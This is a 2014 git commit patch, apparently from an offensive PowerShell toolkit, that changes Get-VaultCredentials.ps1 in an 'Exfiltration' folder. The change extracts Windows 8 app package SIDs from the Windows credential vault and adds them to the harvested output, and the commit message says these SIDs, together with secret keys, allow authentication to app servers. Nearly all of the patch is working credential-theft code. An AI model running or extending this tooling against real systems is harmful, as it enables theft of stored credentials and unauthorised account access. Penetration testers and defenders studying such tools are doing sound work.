From 3444a0700e07e2471e894ce50af69552665e3fbe Mon Sep 17 00:00:00 2001
From: mattifestation <mattgraeber@gmail.com>
Date: Sat, 31 May 2014 21:22:22 -0400
Subject: Updated Get-VaultCredentials - Package SID

Package SIDs are now displayed for Win8 apps. Both the package SID and
secret key are requirements for authenticating to Win8 app servers.
---
 Exfiltration/Get-VaultCredentials.ps1    | 17 ++++++++++++++++-
 Exfiltration/Get-VaultCredentials.ps1xml |  3 +++
 2 files changed, 19 insertions(+), 1 deletion(-)

(limited to 'Exfiltration')

diff --git a/Exfiltration/Get-VaultCredentials.ps1 b/Exfiltration/Get-VaultCredentials.ps1
index c51cc7f..4c33127 100644
--- a/Exfiltration/Get-VaultCredentials.ps1
+++ b/Exfiltration/Get-VaultCredentials.ps1
@@ -235,13 +235,19 @@ Only web credentials can be displayed in cleartext.
                 [Runtime.InteropServices.Marshal]::PtrToStructure($ElementPtr, [Type] [Guid])
             }
 
+            $VAULT_ELEMENT_TYPE::Sid {
+                $SidPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr([IntPtr] $ElementPtr)
+                Write-Verbose "0x$($SidPtr.ToString('X8'))"
+                $SidObject = [Security.Principal.SecurityIdentifier] ([IntPtr] $SidPtr)
+                $SidObject.Value
+            }
+
             # These elements are currently unimplemented.
             # I have yet to see these used in practice.
             $VAULT_ELEMENT_TYPE::ByteArray { $null }
             $VAULT_ELEMENT_TYPE::TimeStamp { $null }
             $VAULT_ELEMENT_TYPE::ProtectedArray { $null }
             $VAULT_ELEMENT_TYPE::Attribute { $null }
-            $VAULT_ELEMENT_TYPE::Sid { $null }
             $VAULT_ELEMENT_TYPE::Last { $null }
         }
     }
@@ -363,10 +369,19 @@ Only web credentials can be displayed in cleartext.
                         $Credential = $null
                     }
 
+                    $PackageSid = $null
+
+                    if ($CurrentItem.pPackageSid -and ($CurrentItem.pPackageSid -ne [IntPtr]::Zero))
+                    {
+                        $PackageSid = Get-VaultElementValue $CurrentItem.pPackageSid
+                    }
+
+
                     $Properties = @{
                         Vault = $VaultType
                         Resource = if ($CurrentItem.pResourceElement) { Get-VaultElementValue $CurrentItem.pResourceElement } else { $null }
                         Identity = if ($CurrentItem.pIdentityElement) { Get-VaultElementValue $CurrentItem.pIdentityElement } else { $null }
+                        PackageSid = $PackageSid
                         Credential = $Credential
                         LastModified = [DateTime]::FromFileTimeUtc($CurrentItem.LastModified)
                     }
diff --git a/Exfiltration/Get-VaultCredentials.ps1xml b/Exfiltration/Get-VaultCredentials.ps1xml
index 7b3f568..33e909f 100644
--- a/Exfiltration/Get-VaultCredentials.ps1xml
+++ b/Exfiltration/Get-VaultCredentials.ps1xml
@@ -22,6 +22,9 @@
                             <ListItem>
                                 <PropertyName>Credential</PropertyName>
                             </ListItem>
+                            <ListItem>
+                                <PropertyName>PackageSid</PropertyName>
+                            </ListItem>
                             <ListItem>
                                 <PropertyName>LastModified</PropertyName>
                             </ListItem>
-- 
cgit v1.2.3